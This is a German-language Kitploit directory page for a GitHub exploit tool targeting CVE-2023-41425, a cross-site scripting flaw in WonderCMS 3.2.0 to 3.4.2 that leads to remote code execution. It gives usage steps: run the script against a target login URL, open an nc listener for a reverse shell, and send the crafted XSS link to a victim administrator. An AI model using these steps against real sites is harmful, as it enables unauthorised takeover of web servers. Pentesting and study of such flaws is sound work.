Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-41425-wonderCMS_RCE — CVE-2023-41425 - Cross-Site Scripting Sicherheitslücke in Wonder CMS v.3.2.0 bis v.3.4.2 ermöglicht es einem entfernten Angreifer, beliebigen Code über ein manipuliertes Skript auszuführen, das in die installModule-Komponente hochgeladen wird. | Kitploit
Tools/GitHubGitHub/thefizzyfish/cve-2023-41425-wondercms_rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubthefizzyfish/cve-2023-41425-wondercms_rce

CVE-2023-41425-wonderCMS_RCE

CVE-2023-41425 - Cross-Site Scripting Sicherheitslücke in Wonder CMS v.3.2.0 bis v.3.4.2 ermöglicht es einem entfernten Angreifer, beliebigen Code über ein manipuliertes Skript auszuführen, das in die installModule-Komponente hochgeladen wird.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
2vor 1 JahrNoch nicht geprüft
Teilen

CVE-2023-41425-wonderCMS_RCE

Cross-Site-Scripting-Sicherheitslücke in Wonder CMS v.3.2.0 bis v.3.4.2 ermöglicht es einem entfernten Angreifer, beliebigen Code auszuführen, indem ein manipuliertes Skript in die installModule-Komponente hochgeladen wird. Nur für Bildungszwecke

Erfordert Kenntnis der loginURL, Administratorzugriff oder die Möglichkeit, den Admin dazu zu bringen, auf den XSS-Link zu klicken.

  1. Repository klonen
root@kitploit:~
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
  1. Ausführen
root@kitploit:~
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
  1. Lokalen Listener einrichten
root@kitploit:~
nc -lnvp 9001
  1. Senden Sie die ausgegebene XSS-URL an das Opfer, oder klicken Sie darauf, wenn Sie Administratorzugriff haben
  2. Auf einen Callback warten

image

Danksagung

prodigiousMind für das Entdecken und Melden der Sicherheitslücke https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

Tool herunterladen